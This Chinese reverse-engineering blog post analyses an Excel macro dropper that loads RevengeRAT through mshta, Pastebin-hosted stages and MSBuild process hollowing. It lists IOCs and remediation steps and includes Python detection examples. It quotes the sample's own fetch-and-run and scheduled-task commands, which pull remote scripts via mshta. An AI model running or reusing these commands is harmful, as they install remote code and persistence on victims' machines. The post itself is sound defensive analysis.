<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="Security industry practitioner, mainly PC reverse engineering with some Android and Linux reversing; occasionally enjoys writing buggy code">
  <meta name="author" content="Cray">
  <meta name="keywords" content="">
  <title>Lunlayloo Trojan ~ Reverse Engineering Security Blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css"  >
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css"  >

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link rel="stylesheet" href="/lib/prettify/tomorrow.min.css"  >

<link rel="stylesheet" href="/css/main.css"  >


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css"  >


<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">


    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">Home</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">Archives</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">Tags</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">Links</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" false
      style="background: url('https://dc.snscz.com/s2/img/original/2019/04/01/14/14004_b10b643428.jpg') no-repeat center center;
      background-size: cover;">
    
        <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
                Lunlayloo Trojan
              
            </span>

            
              <br>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    1k words
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      3 min
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> views
                  </span>&nbsp;
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h2 id="基本信息"><a href="#基本信息" class="headerlink" title="Basic information"></a>Basic information</h2><table>
<thead>
<tr>
<th>FileName</th>
<th>FileType</th>
<th>MD5</th>
<th>Size</th>
</tr>
</thead>
<tbody><tr>
<td>Order____679873892.xls</td>
<td>XLS with VBA macro (RAT dropper)</td>
<td>7641FEF8ABC7CB24B66655D11EF3DAF2</td>
<td>41472 bytes</td>
</tr>
</tbody></table>
<h2 id="简介"><a href="#简介" class="headerlink" title="Overview"></a>Overview</h2><p>The sample is written in VBS and JavaScript. Every intermediate stage is fileless: each stage is fetched from a remote paste and executed in memory, so the attacker can change the content online at any time. That alone evades a good share of security products, and swapping in a different obfuscation layer makes it easy to stay undetected.</p>
<h2 id="流程图"><a href="#流程图" class="headerlink" title="Flowchart"></a>Flowchart</h2><p><img src="https://img-blog.csdnimg.cn/20190920124614242.png" srcset="/img/loading.gif" alt="Infection chain flowchart"></p>
<h2 id="详细分析"><a href="#详细分析" class="headerlink" title="Detailed analysis"></a>Detailed analysis</h2><p>The file carries a VBA macro and the macro project is password-protected; <code>offkey</code> can reset the macro password directly.<br>Once inside the macro code, set a breakpoint at <code>shell(fun)</code> to catch the command the shell call receives:<br><img src="https://img-blog.csdnimg.cn/20190916212336956.png" srcset="/img/loading.gif" alt="screenshot"> <code>mshta http://bit.ly/8hsshjahassahsh</code><br><code>mshta.exe</code> is a signed Windows binary that will happily run script fetched from a URL, and the bit.ly shortener hides the real host behind a redirect.</p>
<p>The page it redirects to looks ordinary, but the malicious JavaScript is right there in the source if you look closely.<br><img src="https://img-blog.csdnimg.cn/20190917141638561.png" srcset="/img/loading.gif" alt="screenshot"><br>Pull it out and print it with <code>console</code>:<br><img src="https://img-blog.csdnimg.cn/20190917141856253.png" srcset="/img/loading.gif" alt="screenshot"><br><img src="https://img-blog.csdnimg.cn/20190917143320931.png" srcset="/img/loading.gif" alt="screenshot"><br>After processing, it executes <code>WScript.Shell.Run mshta http://www.pastebin.com/raw/nv5d9pYu,vbHide</code>.<br>Let us see what that is.<br>The author chose an anonymous paste site to host the code, which makes attribution harder.<br>That raw paste has since been deleted:<br><img src="https://img-blog.csdnimg.cn/20190917143741625.png" srcset="/img/loading.gif" alt="screenshot"><br>The sample had already been run on any.run, however, and the recording captured the request:<br><a target="_blank" rel="noopener" href="https://app.any.run/tasks/0100486e-1711-4af6-a437-74ad27216f36/">https://app.any.run/tasks/0100486e-1711-4af6-a437-74ad27216f36/</a><br><img src="https://img-blog.csdnimg.cn/20190917144032656.png" srcset="/img/loading.gif" alt="screenshot"><br>Extracting that code:<br><img src="https://img-blog.csdnimg.cn/20190917144558325.png" srcset="/img/loading.gif" alt="screenshot"><br>Now for what it does. It first closes any open Excel, Word, PowerPoint and msp windows so that the victim never connects the infection to the macro: out of sight, out of mind.</p>
<p><img src="https://img-blog.csdnimg.cn/20190917151722331.png" srcset="/img/loading.gif" alt="screenshot"></p>
<p>It then installs two scheduled tasks, for persistence and to carry out the next steps:</p>
<p><code>schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe http://pastebin.com/raw/vXpe74L2 /F</code><img src="https://img-blog.csdnimg.cn/20190917154541622.png" srcset="/img/loading.gif" alt="screenshot"><br><code>schtasks /create /sc MINUTE /mo 300 /tn Update /tr mshta.exe http://pastebin.com/raw/JdTuFmc5 /F</code><br><img src="https://img-blog.csdnimg.cn/20190917154555627.png" srcset="/img/loading.gif" alt="screenshot"><br>The two <code>schtasks</code> commands create tasks that re-run two more remote scripts through <code>mshta.exe</code> every 60 and 300 minutes respectively; the task names are chosen to pass for Windows Update.<br>It also adds an autostart entry under the Run key (the <code>AvastUpdate</code> value listed in the remediation section):<br><img src="https://img-blog.csdnimg.cn/2019091715561730.png" srcset="/img/loading.gif" alt="screenshot"></p>
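<p>To triage persistence like the two commands above at scale, here is an added example (not code from the sample or from the original post) that parses <code>schtasks /create</code> command lines and flags the pattern, a script host pulling a remote URL on a short timer under a system-sounding name, rather than the specific Pastebin URL. The two malicious lines are copied from the post exactly as printed there, unquoted; the benign line, the LOLBin list and the rule thresholds are constructed for the example.</p>

```python
"""Parse and rate `schtasks /create` command lines.

Added example for this post; not code from the sample or the original author.
The two malicious command lines are copied from the analysis above, the benign
one is constructed.  The point: recover task name, trigger and action even
from the unquoted form the post shows, then flag the LOLBin-plus-URL
persistence pattern instead of matching the exact Pastebin URL.
"""
import re

# Signed Windows binaries commonly abused to fetch and run remote script
# (list constructed for the example).
LOLBINS = {"mshta", "powershell", "pwsh", "wscript", "cscript",
           "regsvr32", "rundll32", "certutil", "bitsadmin", "msbuild"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def _tokenize(cmdline: str) -> list:
    """Split on whitespace but keep double-quoted spans as one token."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN_RE.finditer(cmdline)]


def parse_schtasks_create(cmdline: str) -> dict:
    """Return {switch: value, ..., 'flags': {bare switches}}.

    A switch's value runs until the next token that starts with '/', so
    `/tn Windows Update /tr mshta.exe http://... /F` (as printed in the post,
    without quotes) yields tn='Windows Update' and the full /tr action.
    Actions whose own arguments start with '/' must be quoted, as schtasks
    itself requires.
    """
    tokens = _tokenize(cmdline)
    exe0 = tokens[0].rsplit("\\", 1)[-1].lower() if tokens else ""
    if exe0 not in ("schtasks", "schtasks.exe") or len(tokens) < 2 \
            or tokens[1].lower() != "/create":
        raise ValueError("not a schtasks /create command line")
    parsed = {"flags": set()}
    i = 2
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if not tok.startswith("/"):
            continue                      # stray token, ignore
        switch = tok[1:].lower()
        values = []
        while i < len(tokens) and not tokens[i].startswith("/"):
            values.append(tokens[i])
            i += 1
        if values:
            parsed[switch] = " ".join(values)
        else:
            parsed["flags"].add(switch)
    return parsed


def assess_task(parsed: dict) -> dict:
    """Heuristic rating of a parsed task; returns the reasons, not just a bool."""
    action = parsed.get("tr", "")
    first = action.split(" ", 1)[0] if action else ""
    exe = first.rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    urls = URL_RE.findall(action)
    name = parsed.get("tn", "")
    reasons = []
    if exe in LOLBINS and urls:
        reasons.append(f"{exe} launched with a remote URL: {urls[0]}")
    if re.search(r"\bupdate\b", name, re.IGNORECASE) and exe in LOLBINS:
        reasons.append(f"task name {name!r} mimics an updater but runs {exe}")
    interval = None
    if parsed.get("sc", "").upper() == "MINUTE":
        try:
            interval = int(parsed.get("mo", "1"))
        except ValueError:
            interval = None
        if interval is not None and interval <= 360 and urls:
            reasons.append(f"re-fetches the remote payload every {interval} minutes")
    if "f" in parsed["flags"]:
        reasons.append("/F silently overwrites any existing task of that name")
    return {"task_name": name, "exe": exe, "urls": urls,
            "interval_minutes": interval,
            "suspicious": bool(urls and exe in LOLBINS), "reasons": reasons}


# Copied from the analysis above (unquoted, exactly as printed there).
SAMPLE_TASKS = [
    "schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe http://pastebin.com/raw/vXpe74L2 /F",
    "schtasks /create /sc MINUTE /mo 300 /tn Update /tr mshta.exe http://pastebin.com/raw/JdTuFmc5 /F",
]
# Constructed benign task for contrast (quoted form).
BENIGN_TASK = 'schtasks /create /sc DAILY /st 03:00 /tn "Nightly Backup" /tr "C:\\Tools\\backup.exe --quiet"'


def triage(cmdlines):
    return [assess_task(parse_schtasks_create(c)) for c in cmdlines]


if __name__ == "__main__":
    for r in triage(SAMPLE_TASKS + [BENIGN_TASK]):
        print(("SUSPICIOUS  " if r["suspicious"] else "ok          ") + r["task_name"])
        for reason in r["reasons"]:
            print("   -", reason)
```

<p>Feeding it the two lines from the post yields both tasks as suspicious with four reasons each, while the quoted benign task parses to the same shape and produces none; the parser rather than the URL list is what survives the attacker rotating pastes.</p>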
<p>Next, what the three scripts do.</p>
<p><code>JdTuFmc5</code> is another layer of encoding; decoded, it reads:</p>
<p><img src="https://img-blog.csdnimg.cn/20190919105945345.png" srcset="/img/loading.gif" alt="screenshot"><br>It tries to download and execute two .NET executables, referred to here as <code>bit1.bin</code> and <code>2bit1.bin</code>; both are analysed below.</p>
<p>The <code>wMG90xwi</code> raw paste defines an object <code>$a</code>: it is <code>bit1.bin</code> loaded into memory as an assembly, ready to be used directly.<br><img src="https://img-blog.csdnimg.cn/20190919105430408.png" srcset="/img/loading.gif" alt="screenshot"><br>Open the DLL in dnSpy and decompile it.</p>
<p>It contains the class <code>THC452563sdfdsdfgr4777cxg04477fsdf810df777</code> and its method <code>retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe(string FTONJ, byte[] coco)</code>.</p>
<p><img src="https://img-blog.csdnimg.cn/20190919110436546.png" srcset="/img/loading.gif" alt="screenshot"><br>The script then calls that method through <code>Invoke</code> with the arguments <code>('MSBuild.exe', $f)</code>: the name of the process to target and the bytes of the second payload.</p>
<p>Checking for a packer shows the assembly is obfuscated with <code>Confuser</code>.</p>
<p>After deobfuscation:<br><img src="https://img-blog.csdnimg.cn/20190920183121543.png" srcset="/img/loading.gif" alt="screenshot"><br>It probes the known install locations for <code>MSBuild.exe</code> in order until it finds the file, then calls <code>ticklens</code>.<br><img src="https://img-blog.csdnimg.cn/20190920183342286.png" srcset="/img/loading.gif" alt="screenshot"><br>The <code>PEHeaderE</code> function patches the program's own code.<br><img src="https://img-blog.csdnimg.cn/20190920184816602.png" srcset="/img/loading.gif" alt="screenshot">The part that matters is <code>FUN</code>:<br><img src="https://img-blog.csdnimg.cn/20190920184846835.png" srcset="/img/loading.gif" alt="screenshot"><br>It calls <code>smethod_0</code> in a loop, and that method is what actually creates the puppet (hollowed) process.</p>
<p><code>lpname</code> names the process to start and open.</p>
<p><code>lpBuf</code> holds the data to inject.</p>
<p><img src="https://img-blog.csdnimg.cn/20190920185315420.png" srcset="/img/loading.gif" alt="screenshot"></p>
<p><img src="https://img-blog.csdnimg.cn/2019092018553021.png" srcset="/img/loading.gif" alt="screenshot"><br><img src="https://img-blog.csdnimg.cn/20190920185552483.png" srcset="/img/loading.gif" alt="screenshot"><br><img src="https://img-blog.csdnimg.cn/20190920185722874.png" srcset="/img/loading.gif" alt="screenshot"><br><img src="https://img-blog.csdnimg.cn/20190920185657512.png" srcset="/img/loading.gif" alt="screenshot"><br><img src="https://img-blog.csdnimg.cn/20190920185749272.png" srcset="/img/loading.gif" alt="screenshot"><br>The sequence above is textbook process injection, the puppet process mentioned earlier: the second executable is written into a freshly created <code>MSBuild.exe</code> and runs under that trusted, signed process name.</p>
<p>So let us look directly at what the injected program is.</p>
<p>Decompiling the second file, <code>2bit1.bin</code>:</p>
<p>A keyword search shows this is a client generated by <code>RevengeRAT</code>.<br><img src="https://img-blog.csdnimg.cn/20190920111854823.png" srcset="/img/loading.gif" alt="screenshot"><br>This RAT has a free edition and leaked builds circulate online; since it is written in .NET, its basic functions are all readily identifiable.</p>
<p>First the C2 address: <code>meandmyjoggar.duckdns.org:777</code>.</p>
<p>The program's mutex name: <code>RV_MUTEX-WindowsUpdateSysten32</code>.</p>
<p>The two scheduled tasks and the Run-key entry all lead to the same program, so they are not repeated here.</p>
<p><strong>In short: the RAT code is injected into a legitimate program so that it runs while hiding from security software.</strong></p>
<h2 id="IOC"><a href="#IOC" class="headerlink" title="IOC"></a>IOC</h2><table>
<thead>
<tr>
<th>Indicator</th>
<th>Type</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="http://www.pastebin.com/raw/nv5d9pYu">http://www.pastebin.com/raw/nv5d9pYu</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/vXpe74L2">http://pastebin.com/raw/vXpe74L2</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/JdTuFmc5">http://pastebin.com/raw/JdTuFmc5</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="http://pastebin.com/raw/CGe3S2Vf">http://pastebin.com/raw/CGe3S2Vf</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pastebin.com/raw/wMG90xwi">https://pastebin.com/raw/wMG90xwi</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pastebin.com/raw/W455MkAZ">https://pastebin.com/raw/W455MkAZ</a></td>
<td>Stage hosting (pastebin raw)</td>
</tr>
<tr>
<td>meandmyjoggar.duckdns.org:777</td>
<td>C2 (RevengeRAT)</td>
</tr>
</tbody></table>
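<p>An added example, not part of the original analysis: it turns the IOC table above into a structural matcher and runs it over constructed proxy, DNS and connection log lines (the log format, timestamps and internal addresses are made up for the example). Pastes match on host and path regardless of scheme or a <code>www.</code> prefix, the C2 matches on host and port, and any other <code>duckdns.org</code> name is surfaced at lower confidence instead of being dropped, since dynamic-DNS names are cheap for the operator to rotate.</p>

```python
"""Match the post's IOCs against constructed network log lines.

Added example, not from the original post.  IOCS is the table above; the log
lines, their format and the 10.0.0.x addresses are constructed.
"""
from urllib.parse import urlsplit

# IOC table from the post: (indicator, role).  The pastes host the script
# stages; the duckdns name is the RevengeRAT C2.
IOCS = [
    ("http://www.pastebin.com/raw/nv5d9pYu", "stage hosting"),
    ("http://pastebin.com/raw/vXpe74L2", "stage hosting"),
    ("http://pastebin.com/raw/JdTuFmc5", "stage hosting"),
    ("http://pastebin.com/raw/CGe3S2Vf", "stage hosting"),
    ("https://pastebin.com/raw/wMG90xwi", "stage hosting"),
    ("https://pastebin.com/raw/W455MkAZ", "stage hosting"),
    ("meandmyjoggar.duckdns.org:777", "C2"),
]
# Dynamic-DNS providers worth a lower-confidence alert even when unlisted.
DYNDNS_SUFFIXES = (".duckdns.org",)


def normalize(indicator: str):
    """-> (host without 'www.', path without trailing '/', port or None)."""
    parts = urlsplit(indicator if "://" in indicator else "//" + indicator)
    host = (parts.hostname or "").lower()
    if host.startswith("www."):
        host = host[4:]
    return host, parts.path.rstrip("/"), parts.port


def build_index(iocs):
    """Two lookup tables: URL IOCs by (host, path), host IOCs by (host, port)."""
    by_path, by_host = {}, {}
    for ind, role in iocs:
        host, path, port = normalize(ind)
        if path:
            by_path[(host, path)] = (ind, role)
        else:
            by_host[(host, port)] = (ind, role)
    return by_path, by_host


def match_line(line: str, index):
    """Return a finding dict or None for one log line.

    Constructed line formats:
      <ts> <src-ip> http <url> <process>
      <ts> <src-ip> dns  <qname>
      <ts> <src-ip> conn <host>:<port>
    """
    by_path, by_host = index
    fields = line.split()
    if len(fields) < 4:
        return None
    ts, src, kind, target = fields[:4]
    host, path, port = normalize(target)
    hit = None
    if kind == "http":
        hit = by_path.get((host, path))
    elif kind == "dns":
        # a DNS lookup has no port, so any listed port for that host counts
        hit = next((v for (h, _p), v in by_host.items() if h == host), None)
    elif kind == "conn":
        hit = by_host.get((host, port))
    if hit:
        return {"ts": ts, "src": src, "indicator": hit[0],
                "role": hit[1], "confidence": "high"}
    if host.endswith(DYNDNS_SUFFIXES):
        return {"ts": ts, "src": src, "indicator": host,
                "role": "dynamic DNS (unlisted)", "confidence": "medium"}
    return None


def scan(lines, iocs=IOCS):
    index = build_index(iocs)
    return [f for f in (match_line(l, index) for l in lines) if f]


# Constructed log lines: one infected host (10.0.0.12), one unrelated host.
LOG_LINES = [
    "2019-09-17T14:40:32Z 10.0.0.12 http http://www.pastebin.com/raw/nv5d9pYu mshta.exe",
    "2019-09-17T14:40:33Z 10.0.0.12 http https://pastebin.com/raw/wMG90xwi mshta.exe",
    "2019-09-17T14:40:40Z 10.0.0.12 http https://pastebin.com/raw/AbCdEf12 chrome.exe",
    "2019-09-17T14:41:05Z 10.0.0.12 dns meandmyjoggar.duckdns.org",
    "2019-09-17T14:41:06Z 10.0.0.12 conn meandmyjoggar.duckdns.org:777",
    "2019-09-17T15:02:11Z 10.0.0.40 dns homecam.duckdns.org",
    "2019-09-17T15:10:00Z 10.0.0.40 http https://www.microsoft.com/ msedge.exe",
]

if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"{f['confidence']:6} {f['src']:10} {f['role']:24} {f['indicator']}")
```

<p>On the constructed lines this reports the two listed pastes, the C2 lookup and the port-777 connection from <code>10.0.0.12</code> at high confidence, flags the unrelated <code>homecam.duckdns.org</code> query at medium, and ignores the unlisted paste and the microsoft.com request. Matching on host and path (rather than the full URL string) is what lets the <code>www.</code> and <code>http</code>/<code>https</code> variants in the table collapse into one indicator each.</p>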
<h2 id="查杀方案"><a href="#查杀方案" class="headerlink" title="Remediation"></a>Remediation</h2><p>Remove the persistence before killing the process; otherwise the 60-minute task simply relaunches the RAT.<br>Delete the scheduled tasks named <code>Windows Update</code> and <code>Update</code><br>Delete the <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate</code> value<br>Terminate the hollowed <code>MSBuild.exe</code> process (the instance connecting to <code>meandmyjoggar.duckdns.org:777</code>, not a legitimate build)<br>Delete <code>Order____679873892.xls</code></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>The infection chain is long, every stage is encoded and has to be decrypted, persistence is established through several independent mechanisms, and the whole thing runs fileless: technically a capable piece of work. Individuals and organisations face threats like this constantly and need to stay alert and prepared.</p>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/%E6%A0%B7%E6%9C%AC%E8%AF%A6%E7%BB%86%E5%88%86%E6%9E%90/">Detailed sample analysis</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/Rat-H-worm/">Rat H-worm</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">Unless otherwise stated, all articles on this blog are licensed under <a target="_blank" href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener noopener">CC BY-SA 3.0</a>. Please credit the source when reposting.</p>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container">
        <div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;Contents</p>
  <div id="tocbot"></div>
</div>
      </div>
    
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>
      var disqus_config = function () {
        this.page.url = 'http://cve.gitee.io/cve/2019/09/06/Lunlayloo 木马/';
        this.page.identifier = '/2019/09/06/Lunlayloo 木马/';
      };
      var oldLoad = window.onload;
      window.onload = function () {
        var d = document, s = d.createElement('script');
        s.type = 'text/javascript';
        s.src = '//' + 'crayon-1' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
      };
    </script>
    <noscript>Please enable JavaScript to view the <a target="_blank" href="https://disqus.com/?ref_noscript" rel="nofollow noopener noopener">comments
        powered by Disqus.</a></noscript>
  </div>


    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv"></span>总访问量 
          <span id="busuanzi_value_site_pv"></span> 次&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv"></span>总访客数 
            <span id="busuanzi_value_site_uv"></span> 人&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script src="/js/main.js" ></script>


  <script src="/js/lazyload.js" ></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var main = $('main');
      var tocT = navHeight + (toc.offset().top - main.offset().top);
      var tocLimMin = main.offset().top - navHeight;
      var tocLimMax = $('#comments').offset().top - navHeight;
      $(window).scroll(function () {
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;
        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': tocT,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
    });
  </script>







  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>


<!-- Plugins -->



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js" ></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>





  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
